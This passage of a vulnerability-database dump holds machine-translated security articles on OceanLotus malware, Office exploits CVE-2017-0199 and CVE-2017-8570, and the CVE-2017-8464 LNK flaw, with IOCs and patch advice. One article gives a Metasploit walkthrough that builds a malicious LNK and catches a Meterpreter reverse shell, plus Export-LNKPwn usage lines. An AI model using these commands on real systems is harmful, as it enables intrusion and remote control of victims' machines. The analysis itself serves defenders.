layer of defenses for assurance,\u201d stressed researchers.\n\n_This article was updated on June 25 to reflect the accurate conversion of XMR to USD._\n", "cvss3": {}, "published": "2020-06-24T21:20:16", "type": "threatpost", "title": "Self-Propagating Lucifer Malware Targets Windows Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6287", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-10271", "CVE-2017-8464", "CVE-2017-9791", "CVE-2018-20062", "CVE-2019-9081"], "modified": "2020-06-24T21:20:16", "id": "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "href": "https://threatpost.com/self-propagating-lucifer-malware-targets-windows-systems/156883/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2018-04-27T15:50:59", "description": "The OceanLotus (Sea Lotus) APT group is a highly organized, professional, foreign state-level hacker group, first discovered and disclosed by 360 SkyEye Labs. Since at least April 2012 the group has carried out organized, systematic, targeted and uninterrupted attacks against Chinese government bodies, research institutes, maritime institutions, maritime construction and shipping companies, and other important sectors.\nRecently, the 360 Threat Intelligence Center captured one of the group's latest attack samples. Analysis showed that the malicious code was delivered using a Microsoft Office vulnerability. After analysing the sample in detail and pivoting on the associated communication infrastructure, we found a new batch of samples and domain names/IP addresses, and from this information we assemble the picture visible from the 360 Threat Intelligence Center into a larger puzzle. 
\nSample analysis\nMD5: 72bebba3542bd86dc68a36fda5dbae76\nFile name: MonthlyReport 03.2018.doc\nThe sample is an RTF document that uses the Office vulnerability CVE-2017-8570 to trigger execution of a VBS script. The script then decrypts and runs a DLL file as well as a piece of shellcode, and the shellcode finally decrypts the main Trojan control module and loads it in memory.\nCVE-2017-8570\nThe RTF document embeds three Package objects, corresponding to VXO53WRTNO.000, fonts.vbs and 3N79JI0QRZHGYFP.sct:\n![](/Article/UploadPic/2018-4/201842619841245.png?www.myhack58.com)\nas well as an OLE2Link object for the CVE-2017-8570 vulnerability, obfuscated as follows:\n![](/Article/UploadPic/2018-4/201842619841649.png?www.myhack58.com)\nThe Package objects contain the original path of the files: C:\\Users\\HNHRMC\\AppData\\Local\\Temp\\VXO53WRTNO.000\n![](/Article/UploadPic/2018-4/201842619841309.png?www.myhack58.com)\nAfter the vulnerability is triggered, 3N79JI0QRZHGYFP.sct is started, and this script runs the fonts.vbs script via CMD.EXE:\n![](/Article/UploadPic/2018-4/201842619841299.png?www.myhack58.com)\nfonts.vbs\nfonts.vbs actually acts as a loader. When it is executed, it first reads the content of VXO53WRTNO.000 in the Temp directory into memory, Base64-decodes it and then AES-decrypts it to obtain the shellcode. It then decrypts its own hard-coded Load_dll in the same way, dynamically loads Load_dll, instantiates a sHElla object from it, and finally executes the shellcode by calling the sHElla.forebodinG(shellcode) method:\n![](/Article/UploadPic/2018-4/201842619842255.png?www.myhack58.com)\n\n![](/Article/UploadPic/2018-4/201842619842431.png?www.myhack58.com)\nLoad_dll\nThe forebodinG method of Load_dll copies the received shellcode into newly allocated memory, converts the memory address into a corresponding delegate and invokes it to execute the shellcode:\n![](/Article/UploadPic/2018-4/201842619842220.png?www.myhack58.com)\n\n![](/Article/UploadPic/2018-4/201842619842512.png?www.myhack58.com)\nShellCode\nThe function of the shellcode is to extract a PE file from itself and then load that PE file into memory for execution. The export name of the PE file is {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll; the figure below shows the PE header data after correction:\n![](/Article/UploadPic/2018-4/201842619842916.png?www.myhack58.com)\nExport name information of the dumped DLL file:\n![](/Article/UploadPic/2018-4/201842619843635.png?www.myhack58.com)\n{A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll\nThe DLL decrypts an encrypted resource file stored in its resources:\n![](/Article/UploadPic/2018-4/201842619845229.png?www.myhack58.com)\nAt run time the DLL first accesses the resource file and RC4-decrypts it:\n![](/Article/UploadPic/2018-4/201842619845919.png?www.myhack58.com)\nThe decrypted resource file contains the Trojan configuration information and three DLL files related to network communication; these files support HTTP, HTTPS and UDP protocol communication. The figure below shows the decrypted resource file:\n![](/Article/UploadPic/2018-4/201842619845124.png?www.myhack58.com)\nAfter analysis, the data structure of the configuration is as follows:\n![](/Article/UploadPic/2018-4/201842619845650.png?www.myhack58.com)\nThe DLL then loads in memory the three network-related DLLs from the decrypted resource file, collects local host information, encodes it and combines it with the three domains icmannaws.com, orinneamoure.com and ochefort.com to form sub-domains used for network communication, and finally accepts instructions from the controller to implement the following remote control features: \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-26T00:00:00", "type": "myhack58", "title": "Sea Lotus APT groups use CVE-2017-8570 vulnerability of the new sample and Association analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2018-04-26T00:00:00", "id": "MYHACK58:62201890088", "href": "http://www.myhack58.com/Article/html/3/62/2018/90088.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-14T16:17:00", "description": "On its June Patch Tuesday, Microsoft disclosed two remote code execution vulnerabilities that are being exploited in the wild: the Windows Search remote code execution vulnerability (CVE-2017-8543) and the LNK file shortcut (CVE-2017-8464) remote code execution 
vulnerability.\nVulnerability name: Windows Search remote code execution vulnerability\nVulnerability ID: CVE-2017-8543\nVulnerability rating: Critical\nVulnerability summary: Windows Search Service (WSS) is a basic Windows service that is enabled by default. It allows users to search across multiple Windows services and clients. A remote code execution vulnerability exists in the way Windows Search handles objects in memory. An attacker who successfully exploits this vulnerability can take control of the affected system.\nTo exploit the vulnerability, an attacker could send specially crafted SMB messages to the Windows Search service, and use the vulnerability to elevate privileges and take control of the computer. In addition, in an enterprise scenario, an unauthenticated attacker could trigger the vulnerability remotely through an SMB connection and then take control of the target computer.\nAffected versions\nDesktop: Windows 10, 7, 8, 8.1, Vista, XP, and Windows RT 8.1\nServer: Windows Server 2016, 2012, 2008, 2003\nRemediation:\nDesktop Windows 10, 7, 8.1 and Windows RT 8.1, and Windows Server 2016, 2012 and 2008, can be patched through Windows Update automatic updates.\nWindows 8, Vista, XP and Windows Server 2003 must select the corresponding version and install the patch manually\n(patch download address: https://support.microsoft.com/zh-cn/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms)\nVulnerability name: LNK file shortcut remote code execution vulnerability\nVulnerability ID: CVE-2017-8464\nVulnerability rating: Critical\nVulnerability summary: if a user opens a malicious LNK file carefully constructed by an attacker, remote code execution results. An attacker who successfully exploits this vulnerability gains the same rights as the local user.\nThe attacker can deliver the malicious LNK file and its associated malicious binary to the user through a removable drive, USB flash drive, remote share, etc. When the user opens the malicious .LNK file with Windows Explorer or any other program that parses LNK files, the associated malicious binary executes on the target system.\nAffected versions\nDesktop: Windows 10, 7, 8.1, 8, Vista, and Windows RT 8.1\nServer: Windows Server 2016, 2012, 2008\nRemediation:\nDesktop Windows 10, 7, 8.1 and Windows RT 8.1, and Windows Server 2016, 2012 and 2008, can be patched through Windows Update automatic updates.\nWindows 8 and Vista must select the corresponding version and install the patch manually\n(patch download address: https://support.microsoft.com/zh-cn/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms)\nReferences\nhttps://threatpost.com/microsoft-patches-two-critical-vulnerabilities-under-attack/126239/\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8543\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464\nhttps://support.microsoft.com/zh-cn/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-14T00:00:00", "type": "myhack58", "title": "\u3010Major vulnerability warning\u3011Windows two critical remote code execution vulnerability-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2017-8543"], "modified": "2017-06-14T00:00:00", "id": "MYHACK58:62201787021", "href": "http://www.myhack58.com/Article/html/3/62/2017/87021.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-08-11T15:16:29", "description": "The so-called CVE-2017-8570 sample\nLast week, 360 SkyEye Labs found that a foreign hacker had released CVE-2017-8570 exploit code on GitHub and then deleted it. Searching for it turned up quite a few Office malware samples labelled as CVE-2017-8570, such as the following sample, which VirusTotal marks as CVE-2017-8570.\n![](/Article/UploadPic/2017-8/2017811192832900.png?www.myhack58.com)\nAfter analysis by 360 SkyEye Labs, we found that the relevant exploit code still uses the old CVE-2017-0199 rather than the new CVE-2017-8570. Our analysis follows, for peer reference.\nFirst analyse the sample's ppt\\slides\\_rels\\slide1.xml.rels file: rId3 is an OLE object pointing to an external link. Note the string \u201cscript:http//[server]/test.sct\u201d; the important part is \u201cscript:\u201d, which identifies the moniker that MkParseDisplayName will use in the next step, namely the Script Moniker.\n![](/Article/UploadPic/2017-8/2017811192833273.png?www.myhack58.com)\nThe Script Moniker is exactly one of the two monikers that Microsoft's April patch disabled:\n! 
[](/Article/UploadPic/2017-8/2017811192833131.png?www.myhack58.com)\nIn April 2017, the fix for CVE-2017-0199 disabled the htafile object and the script object:\n\n| Disabled CLSID | ProgID | CVE |\n| --- | --- | --- |\n| {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} | htafile | CVE-2017-0199 |\n| {06290BD3-48AA-11D2-8432-006008C3FBFC} | script | CVE-2017-0199 |\n\nThe following stack reflects the execution of the sample in an environment where the CVE-2017-0199 patch has not been applied:\n0:000> k\nChildEBP RetAddr\n003c2ea4 6c49d2f5 kernel32!CreateProcessW\n003c2f2c 6c49d5f7 wshom!CWshShell::CreateShortcut+0x161\n003c2f8c 75753e75 wshom!CWshShell::Exec+0x19a\n003c2fac 75753cef OLEAUT32!DispCallFunc+0x165\n003c303c 6c4a0267 OLEAUT32!CTypeInfo2::Invoke+0x23f\n003c306c 6c4967d5 wshom!CDispatch::Invoke+0x5c\n003c3098 7005dc18 wshom!CWshEnvRegistry::Invoke+0x29\n003c30d8 7005db6c jscript!IDispatchInvoke2+0xf0\n003c3114 7005dadf jscript!IDispatchInvoke+0x6a\n003c31d4 7005dc6a jscript!InvokeDispatch+0xa9\n003c3200 7005d9a8 jscript!VAR::InvokeByName+0x93\n003c324c 7005da4f jscript!VAR::InvokeDispName+0x7d\n003c3278 7005e4c7 jscript!VAR::InvokeByDispID+0xce\n003c3414 70055d7d jscript!CScriptRuntime::Run+0x2b80\n003c34fc 70055cdb jscript!ScrFncObj::CallWithFrameOnStack+0xce\n003c3544 70055ef1 jscript!ScrFncObj::Call+0x8d\n003c35c0 7005620a jscript!CSession::Execute+0x15f\n003c360c 70050399 jscript!COleScript::ExecutePendingScripts+0x1bd\n003c362c 7301831f jscript!COleScript::SetScriptState+0x98\n003c363c 73018464 tongfang!ScriptEngine::Activate+0x1a\n003c3654 730199d3 tongfang!ComScriptlet::Inner::StartEngines+0x6e\n003c36a4 7301986e tongfang!ComScriptlet::Inner::Init+0x156\n003c36b4 7301980b tongfang!ComScriptlet::New+0x3f\n003c36d4 730197d0 tongfang!ComScriptletConstructor::CreateScriptletFromNode+0x26\n003c36f4 730237e2 tongfang!ComScriptletConstructor::Create+0x4c\n003c3714 73024545 tongfang!ComScriptletFactory::CreateScriptlet+0x1b\n003c3734 76fcc6fd tongfang!ComScriptletMoniker::BindToObject+0x4d\n003c3760 7708440c ole32!BindMoniker+0x64\n003c37e8 770c5c07 ole32!wCreateLinkEx+0x9f\n003c3848 770c6137 ole32!OleCreateLinkEx+0xaa\n003c3884 713a2f10 ole32!OleCreateLink+0x42\nWARNING: Stack unwind information not available. Following frames may be wrong.\n003c59c4 7124e908 ppcore!DllGetLCID+0x2b3090\n003c6a60 710928e4 ppcore!DllGetLCID+0x15ea88\n003c6a90 714adb02 ppcore!PPMain+0x2cf6c\nThe sample is in fact CVE-2017-0199 using another way of inserting an htafile or script object, not CVE-2017-8570.\nThe CVE-2017-0199 patch trap\nThe so-called CVE-2017-8570 sample above is actually CVE-2017-0199, yet on a machine we believed had the CVE-2017-0199 patch installed, the vulnerability could still be triggered. After deeper analysis, we found that the problem was that the patch had not been fully applied.\nThe CVE-2017-0199 patch Microsoft released in April is divided into two parts: an Office patch (which modifies MSO.dll) and a Windows patch (which mainly modifies ole32.dll). Both patches must be installed to guarantee that the system is not affected by CVE-2017-0199.\n![](/Article/UploadPic/2017-8/2017811192833796.png?www.myhack58.com)\nThe red box is the Office patch; the blue box is the Windows system patch.\nThe Windows system patch is mostly installed normally, but whether the Office patch installs properly depends on the current Office version. The Office versions Microsoft listed in the security advisory for the April patch are as follows:\nMicrosoft Office 2007 Service Pack 3\nMicrosoft Office 2010 Service Pack 2 (32-bit editions)\nMicrosoft Office 2010 Service Pack 2 (64-bit editions)\nMicrosoft Office 2013 RT Service Pack 1\nMicrosoft Office 2013 Service Pack 1 (32-bit editions)\nMicrosoft Office 2013 Service Pack 1 (64-bit editions)\nMicrosoft Office 2016 (32-bit edition)\nMicrosoft Office 2016 (64-bit edition)\nNote that the patch Microsoft provides is closely matched to a major Office version and service pack. For example, Microsoft offers the patch for Microsoft Office 2013 Service Pack 1, but some earlier versions of Office, such as Microsoft Office 2013 without SP1, will not install the CVE-2017-0199 MSO patch; they must first be upgraded to the latest SP1 version. Also, all Office versions not listed above cannot be patched normally and remain affected by the 0199 vulnerability; examples follow.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-11T00:00:00", "type": "myhack58", "title": "Oolong CVE-2017-8570 samples and behind the idea-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570", "CVE-2017-0199"], "modified": "2017-08-11T00:00:00", "id": "MYHACK58:62201788542", "href": "http://www.myhack58.com/Article/html/3/62/2017/88542.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-09T15:19:37", "description": "Background of Office advanced threat vulnerabilities\nIn advanced threat attacks, the vulnerabilities hackers most like to use for remote delivery and intrusion of clients are Office document vulnerabilities. At the just-concluded Black Hat conference, the award for best client-side security vulnerability went to CVE-2017-0199, which is nowadays the most popular vulnerability in the Office vulnerability field; the honor of best client-side security vulnerability was 
attributed to Ryan Hanson, Haifei Li, Bing Sun and an unknown hacker.\n\n![](/Article/UploadPic/2017-8/2017881861997.png?www.myhack58.com)\nCVE-2017-0199 is a logic vulnerability in the Office suite. Unlike conventional memory corruption vulnerabilities, this type of vulnerability needs no complex exploitation technique: it runs arbitrary malicious scripts directly from an Office document, and its exploitation is stable and reliable. Microsoft fixed CVE-2017-0199 in its April security updates, but the fix and defences of that security patch could still be bypassed, and the July Microsoft security update fixed a new vulnerability of the same type, CVE-2017-8570. At the SyScan360 2017 Seattle security conference, the talk by Haifei Li and Bing Sun, Moniker Magic: Running Scripts Directly in Microsoft Office, analysed the principle of this kind of vulnerability in detail, which this article will not repeat; the following focuses on analysing in-the-wild exploitation of these vulnerabilities.\nIn-the-wild exploitation, first version: RTF\nWhen CVE-2017-0199 was first disclosed, the earliest in-the-wild exploit samples were spread in the form of Word documents. Because Office document suffixes are associated with loose parsing behaviour, the attack still succeeds when the document extension is changed, so the true file format of most malicious in-the-wild documents is RTF while the extension is doc, docx, etc.; the attack therefore has strongly deceptive camouflage.\nThe in-the-wild sample file format contains the keyword objupdate, whose role is to update the object automatically. When the victim opens the Office document, it loads the remote URL object and triggers an HTTP request to the remote server; the malicious server forces the Content-Type of the response to the client's HTTP request to application/hta, and finally the client Office process runs the downloaded remote file as an HTA script. The whole attack process is stable and requires no interaction from the victim.\n\n![](/Article/UploadPic/2017-8/2017881861193.png?www.myhack58.com)\nIn-the-wild exploitation, second version: PPSX\nSince the RTF version of the exploit has been used a great deal, the detection rate of domestic security software is relatively high, and attackers began to turn to another Office document format for the attack. The attackers found that a slide document in ppsx format can also trigger the vulnerability without interaction. The principle is to use slide animation events: when certain predefined trigger events of the slide are fired automatically, they lead to the exploit.\nThe figure below shows the malicious animation event embedded in a popular attack sample:\n\n![](/Article/UploadPic/2017-8/2017881862289.png?www.myhack58.com)\nThe event is associated with an olelink object; the principle is similar to the RTF version, as in the following XML fields.\n\n![](/Article/UploadPic/2017-8/2017881862532.png?www.myhack58.com)\nBut the object embeds a remote address with a script protocol header, and the URL in the XML file points to a malicious sct script.\n\n![](/Article/UploadPic/2017-8/2017881862929.png?www.myhack58.com)\nWhen the victim opens the malicious slide document, it automatically loads the remote URL object, initiates an HTTP request to the remote server, downloads the file locally, and finally the client Office process executes the downloaded local file as an sct script.\nLatest popular third version: DOCX\nRecently we found that some documents whose true file format is docx have added the CVE-2017-0199 exploit. The attacker very cleverly embeds the RTF file containing the CVE-2017-0199 vulnerability into the docx document as a remote source, so that when the resulting docx file is opened it automatically fetches the remote RTF file containing the 0199 vulnerability and then triggers the subsequent chain of attacks. Such attacks make detection harder for security software, and some antivirus software has not noticed at all!\nAs the figure below shows, the docx format document embeds a remote document object:\n\n![](/Article/UploadPic/2017-8/2017881862940.png?www.myhack58.com)\nWhen the document is opened, it automatically opens the remote malicious RTF file!\n\n![](/Article/UploadPic/2017-8/2017881862112.png?www.myhack58.com)\nWe can see that the in-the-wild RTF sample has a VT detection rate of 31/59.\n\n![](/Article/UploadPic/2017-8/2017881862507.png?www.myhack58.com)\nWhile the latest popular DOCX version has a detection rate of only 5/59.\n\n![](/Article/UploadPic/2017-8/2017881862829.png?www.myhack58.com)\nThe latest discovered \u201cOolong\u201d (mix-up) sample\nLast week we found in the outside world many malicious Office slide document samples labelled as CVE-2017-8570, and some vendors claimed to be the first to capture the latest Office vulnerability. After analysis, however, we found that the samples are still the second, PPSX version of the in-the-wild CVE-2017-0199 exploit. From the analysis of a typical sample, we found that the payload used is the Loki Bot information-stealing Trojan, carrying out targeted theft attacks.\n\n![](/Article/UploadPic/2017-8/2017881862994.png?www.myhack58.com)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-08T00:00:00", "type": "myhack58", "title": "Office of the senior threat vulnerability in the wild use analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570", "CVE-2017-0199"], "modified": "2017-08-08T00:00:00", "id": "MYHACK58:62201788439", "href": 
"http://www.myhack58.com/Article/html/3/62/2017/88439.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-06T22:18:09", "description": "As early as 6 May 13, Microsoft released patches to fix numbered CVE-2017-8464 vulnerability, a local user or a remote attacker can exploit this vulnerability to generate a specially crafted shortcut, and through a removable device or a remote shared way lead to remote code execution, Dating back to the past, the NSA recognized the use of similar vulnerabilities and to\u201cOlympic Game\u201dfor the code developed Stuxnet virus, to prevent Iran from developing nuclear weapons. \nCVE-2017-8464 vulnerability affects versions: \nWindows 7 \nWindows 8.1 \nWindows RT 8.1 \nWindows 10 \nWindows Server 2008 \nWindows Server 2008 R2 \nWindows Server 2012 \nWindows Server 2012 R2 \nWindows Server 2016 \nUse \n1 in Metasploit-Framework in the use of CVE-2017-8464 \n1. First download the latest zip package\u3010download\u3011, download after the completion of the compressed package inside the modules/exploits/windows/fileformat in cve_2017_8464_lnk_rce. rb is copied to the directory/usr/share/metasploit-framework/modules/exploits/windows/fileformat. \n2. Just copy the rb file will be an error, must then be compressed within the package data/exploits in the cve-2017-8464 folder copy to/usr/share/metasploit-framework/data/exploits. \n3. Open a terminal \nmsfconsole \nuse exploit/windows/fileformat/cve_2017_8464_lnk_rce \nset PAYLOAD windows/meterpreter/reverse_tcp \nset LHOST [your IP address] \nTrojan \n! [](/Article/UploadPic/2017-8/20178711814896. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-8/20178711814375. png? www. myhack58. com) \nAfter/root/. msf4/local, it will generate our desired files, generate so much and the letter is concerned, are left with no space. \n4. 
Continue to enter the command \nuse multi/handler \nset paylaod windows/meterpreter/reverse_tcp \nset LHOST [your IP address] \nrun \n5. The removable disk inserted into the drone, if the drone on auto play, select the Browse for a file when you can rebound. \n! [](/Article/UploadPic/2017-8/20178711814631. png? www. myhack58. com) \nDemo: \n! [](/Article/UploadPic/2017-8/20178711814509. gif? www. myhack58. com) \n*2\uff09PowerShell \nThis using the Powershell method is not the previous network spread of the CVE-2017-8464 reproduction method. \nFirst of all download the Export-LNKPwn. ps1\u3010Click here\u3011 \nNote: \n-Need 4. 0 or above. NET Library version; the author used a few constructs that exist only in PowerShell 5.0, such as new(), and intends to lower the version requirement to .NET 3.5 and PowerShell 2.0, so the module can be loaded into memory in all target environments. \n-The authors want to expand the function, so the user can generate the original Stuxnet LNK exp\uff08CVE-2010-2568, and solve the bypass issue CVE-2015-0096 in it. \n-Antivirus will handle your LNK, and more than ready to escape detection! \nParameter Description: \nLNKOutPath: local save the LNK file's full path. \nTargetCPLPath: local/remote target cpl of the full path. \nType: used FolderDataBlock type,\u201cSpecialFolderDataBlock\u201dand\u201cKnownFolderDataBlock\u201dtwo. 
\nExample of use: \nC:\\PS> The Export-LNKPwn-LNKOutPath C:\\Some\\Local\\Path.lnk -TargetCPLPath C:\\Target\\CPL\\Path.cpl -Type SpecialFolderDataBlock \nC:\\PS> The Export-LNKPwn-LNKOutPath C:\\Some\\Local\\Path.lnk -TargetCPLPath C:\\Target\\CPL\\Path.cpl -Type KnownFolderDataBlock \n\n", "cvss3": {}, "published": "2017-08-07T00:00:00", "type": "myhack58", "title": "\u201cThe seismic network of the third generation\u201d\uff08CVE-2017-8464 several species using the method and prevention-vulnerability and early warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2010-2568", "CVE-2015-0096"], "modified": "2017-08-07T00:00:00", "id": "MYHACK58:62201788412", "href": "http://www.myhack58.com/Article/html/3/62/2017/88412.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-09T15:19:46", "description": "Microsoft in the 2017 year 6 month patch patch a shortcut CVE-2107-8464 of vulnerability, the announcement says this vulnerability is the National background of network attacks the use to implement the attack, the vulnerability is also known as the seismic network of the third generation, recently Metasploit published on the vulnerability of the PoC. 
[ This article is HanSight Han si original manuscript, for reprint please indicate the source\uff01] \nMicrosoft in the 2017 year 6 month patch patch a shortcut CVE-2107-8464 of vulnerability, the announcement says this vulnerability is the National background of network attacks the use to implement the attack, the vulnerability is also known as\u201cearthquake network generation\u201d, recently Metasploit published on the vulnerability of the PoC. \nThe vulnerability principle is the same as 2010, the United States and Israel to invade and destroy Iran's nuclear facilities seismic network operations the use of penetrating nuclear isolation network Vulnerability, CVE-2010-2568 is very similar,\"it can easily be exploited by hackers to attack the infrastructure, storage of key information on core isolation system.\" \n\"When there is a vulnerability in the computer is plug in to save a vulnerable file of U disc, no need extra operation, exploits the program can perform and complete control of the user computer system\" is. \nVulnerability PoC demo: \n! [](/Article/UploadPic/2017-8/201789195027567. gif? www. myhack58. com) \nThe PoC for the LNK File format as shown below: \n! [](/Article/UploadPic/2017-8/201789195027829. png? www. myhack58. com) \nLNK File format the following figure \nTypically contains a Link to the file header, LinkTargetIDList, the error pop-UPS, And StringData and the extradata property of. \n! [](/Article/UploadPic/2017-8/201789195027941. jpg? www. myhack58. com) \nThe PoC relates to the important field, after the text will be explained. \nWant to trigger this vulnerability, LNK files must have the LinkTargetIDList and the extradata property of the two Block. PoC File format figure in the second row of numbers 81, The representative is the LNK file header of the LinkFlags field, 81 is the meaning of the LNK file contains a LinkTargetIDList, and string using Unicode encoding. 
In LinkTargetIDList followed by is the extradata property, the present vulnerability is SpecialFolderDataBlock it. \nLinkTargetIDList format the following figure \nThe PoC contains 3 item, wherein the item 2 containing the trigger the vulnerability after the automatic execution of the malicious DLL file path: \n! [](/Article/UploadPic/2017-8/201789195027452. jpg? www. myhack58. com) \nPoC IDListSize is 0x8E, which has 3 item, the first item The size is 0\u00d714, and the second item The size is 0\u00d714, and the third item The size is 0\u00d764 in. \nLinkTargetIDList included in the Item format is as follows: \n! [](/Article/UploadPic/2017-8/201789195027566. jpg? www. myhack58. com) \nThe extradata property format the following figure \nThe vulnerability used is SpecialFolderDataBlock: the \n! [](/Article/UploadPic/2017-8/201789195027884. jpg? www. myhack58. com) \nTo understand the Complete file formats, vulnerability principle not very complicated: finished parsing LinkTargetIDList after parsing SpecialFolderDataBlock, parsing SpecialFolderDataBlock process CShellLink::_DecodeSpecialFolder will according to which the offset 0\u00d728 to find the front of the item 2, and will be one of the DLLload into memory to perform one of the DllMain. Due to this parsing process is in the explorer. exe in the implementation, so the corresponding load into memory a malicious DLL also has the same high permissions is generally High in. \nThe figure below is the PoC exploit is triggered when the call stack, as well as vulnerability after the implementation will load the malicious DLL into memory: \n! [](/Article/UploadPic/2017-8/201789195027956. jpg? www. myhack58. com) \n! [](/Article/UploadPic/2017-8/201789195027572. jpg? www. myhack58. com) \nPatch comparison: \n! [](/Article/UploadPic/2017-8/201789195027161. jpg? www. myhack58. 
